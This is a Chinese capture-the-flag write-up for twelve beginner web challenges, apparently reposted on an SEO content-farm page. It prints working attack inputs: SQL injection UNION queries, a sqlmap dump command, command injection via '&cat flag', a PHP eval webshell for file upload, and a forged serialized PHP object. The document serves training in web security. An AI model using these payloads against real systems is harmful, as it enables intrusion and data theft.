当前位置: 首页 > news >正文

做logo的网站北京seo关键词优化收费

news 2026/4/6 23:38:14
做logo的网站,北京seo关键词优化收费,介绍自己的做的网站吗,深圳网站建设制作哪家便宜目录 1、F12 2、robots 3、game1-喂青蛙 4、game 2 - flap bird 5、game 3 - Clash 6、Get&Post 7、sql (1)手工注入 (2)工具注入 8、命令执行漏洞 9、文件上传漏洞 10、文件泄露 11、php反序列化漏洞 12、PHP绕…

目录

1、F12

2、robots

3、game1-喂青蛙

4、game 2 - flap bird

5、game 3 - Clash

6、Get&Post

7、sql

(1)手工注入

(2)工具注入

8、命令执行漏洞

9、文件上传漏洞

10、文件泄露

11、php反序列化漏洞

12、PHP绕过

1、F12

根据题目提示直接F12看源代码在注释里找到flag

flag{s0_eaSyest_wEb_fl2} 

2、robots

直接访问robots.txt

得到

继续访问Myon.php

拿到flag

flag{oH_My_bOy_You_fiNd_mE!}

3、game1-喂青蛙

找到输出flag的判断条件,直接改为if(1),Ctrl+S保存,开始等待时间结束即可

或者自己打到66或56分也会得到flag,也可以改成自己希望输出flag的分数再打到对应分数即可

flag{b928e21ad8b3ab6698e3c273e39eda5b}

4、game 2 - flap bird

随便玩玩就出flag

flag{9c5046d299ac704475bcd7d6c56c9519}

5、game 3 - Clash

打爆中间的boss就出flag

flag{16da83e9da66fcd097c1032aa2f6ca3b}

6、Get&Post

简单的get和post传参,根据要求传入对应内容即可

flag{welcome-to-ctf-enjoy} 

7、sql

简单的SQL注入

(1)手工注入

使用order by判断一下字段数:

试到3的时候后报错,说明有两列

查数据库名:

union select 1,database()

发现数据库名为test

查该数据库下的所有表名:

union select 1,table_name from information_schema.tables where table_schema='test'

发现该数据库下有一个名为flag的表

直接在该表下尝试查询关键字flag:

union select 1,flag from flag

拿到flag 

snert{9c565f3584a8e7ad64a73996b615811b}

(2)工具注入

由于这里不存在任何过滤和绕过,使用sqlmap跑一下,只需要提供注入点是id,直接得flag

sqlmap -u "http://snert.vip:8079/?id=1" --dump

8、命令执行漏洞

随便ping一个ip之后发现ping命令被执行了

我们在ip后使用&进行连接,后面接其他想要执行的命令

127.0.0.1&ls

可以看到存在flag,直接cat flag

127.0.0.1&cat flag 

flag{Myon_myon_my}

9、文件上传漏洞

很明显的文件上传,并且这里不存在任何绕过

直接上传一句话木马

<?php @eval($_POST['cmd']);?>

根据题目提示,文件会被传到uploads目录下

使用蚁剑尝试连接

找到flag 

flag{just_easy_wjsc}

10、文件泄露

根据题目提示,扫描一下目录

发现存在robots.txt

 

访问之后发现另一个文件地址 /wzym123.zip

直接访问该地址,将文件下载下来

经过寻找最终在sqqyw.sql下找到flag

flag{!@#$kobi123}

11、php反序列化漏洞

简单审计一下PHP代码,这里需要给参数data传入序列化的user对象

原本 $isAdmin = false

输出flag的判断条件:

if ($user->isAdmin) {

echo "Welcome, admin!";
            include("flag.php");
            echo $flag;

判断use是不是admin(其实就是调用user这个类下的参数isAdmin)
只需要将isAdmin改为true,再将整个类进行序列化,传给data即可

php代码:

<?php
class User {public $username;public $isAdmin = true;
}$u = new User();
echo serialize($u);
?>

使用get方法给data传入序列化后的内容

payload:O:4:"User":2:{s:8:"username";N;s:7:"isAdmin";b:1;}

回显flag

flag{its_an_1Z_PHP_unserialize}

12、PHP绕过

就是一些对PHP常见特性和函数的绕过

这里payload有很多,我只给出一个示例

payload:
?myon1[]=1&&myon2[]=2
myon3[]=3&&myon4[]=4&&swust[]=1&&hacker=1e10&&lover=0

关于这些PHP特性绕过的详细讲解可以参考我另一篇博客

http://t.csdnimg.cn/VjNB7

http://www.hkea.cn/news/873401/

相关文章:

  • 用hadoop做网站日志分析推广工作的流程及内容
  • 凡科做网站技巧站长之家域名信息查询
  • 网站建设国际深圳网络营销课程ppt
  • 网站开发人员需要具备的能力电脑培训班多少费用
  • discuz集成wordpressseo的概念是什么
  • 子网站如何做网站营销方案模板
  • dreamweaver做的网站电商培训班一般多少钱
  • 国外做科研的网站东莞网站设计公司排名
  • 亿唐网不做网站做品牌原因seo网站诊断报告
  • 宝鸡网站建设东东怎么推广软件让别人下载
  • 21dove谁做的的网站百度一下首页设为主页
  • 猪八戒网站建设推广平台排名前十名
  • 广西建设质监站官方网站站长工具seo综合查询可以访问
  • 通用搭建网站教程优化营商环境的意义
  • 网站中加入地图怎样优化网站排名
  • 网站如何被搜索引擎收录地推推广平台
  • 池州做网站公司游戏搜索风云榜
  • 东丽区做网站网站查询平台
  • wordpress什么主题好用seo优化范畴
  • 局域网端口映射做网站西安竞价托管代运营
  • 重庆网站建设设计公司信息ip网站查询服务器
  • 网站积分的作用seo搜索引擎优化就业前景
  • 珠海网站品牌设计公司简介最新国内新闻重大事件
  • 广东专业网站客服软件定制站长统计app下载大全
  • 广东网站建设公司排名磁力帝
  • 胶南网站建设哪家好成都电脑培训班零基础
  • 集团网站建设哪家好网上推广怎么弄?
  • dz网站建设器最近有新病毒出现吗
  • 个人网站制作说明香港旺道旺国际集团
  • 监控做直播网站免费网站seo